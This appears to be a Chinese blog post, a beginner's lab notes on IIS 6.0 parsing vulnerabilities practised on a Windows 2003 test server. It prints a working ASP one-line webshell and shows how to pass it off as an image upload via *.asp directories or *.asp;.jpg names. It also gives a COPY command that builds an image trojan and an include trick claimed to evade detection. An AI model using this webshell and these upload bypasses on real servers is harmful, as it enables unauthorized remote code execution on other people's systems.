初窥渗透--IIS6.0解析漏洞

    学渗透一定要动手操作,一个简单的动作重复N遍以上就能学会了。

    最近在学习一句话木马的使用,加上中国菜刀,真是个居家旅行的必备技能。举例说asp的一句话:

<%execute request(chr(97))%>

a就是连接密码了。(一定要写对chr(97),我看着书写char(97)被坑了一下午...还以为是服务器设置问题)。但是今天我练习的时候遇到了只能上传图片的漏洞,然后就去网上找姿势,就学习了IIS6.0的解析漏洞了。


我的练习环境是windows 2003的IIS6.0,这个版本有两个解析漏洞:

1、在网站目录中如果存在名为*.asp、*.asa的目录,那该目录内的任何文件都会被IIS解析为asp文件并执行。

2、在上传图片木马的时候,将文件名改为*.asp;.jpg,该文件文件都会被IIS解析为asp文件并执行。


第一个漏洞测试成功了,在网站目录下创建了一个1.asp目录,在目录下上传了内容为<%execute request(chr(97))%>但文件名为cmd.jpg的”图像“文件,用菜刀成功连接。

第二个漏洞同理,不同的只是之间建立一个同样内容的cmd.asp;.jpg文件。


至于制作asp图片木马,今天学到了一个copy拼接的方法:

准备一张图片(尽可能小点吧,10k左右?对加载应该有影响),命名为1.jpg

写asp一句话木马,命名为1.asp

打开cmd,执行COPY 1.jpg /b + 1.asp /a asp.jpg拼接得到asp.jpg即时asp图片木马了。【/b表示指定一个二进制文件,/a表示指定一个ASCII文件】

可以再创建一个asp.asp文件,内容为<!-- #include file="asp.jpg"-->,放在同一个目录下,听说可以绕过检测。明天试一下~~~

展开阅读全文

没有更多推荐了,返回首页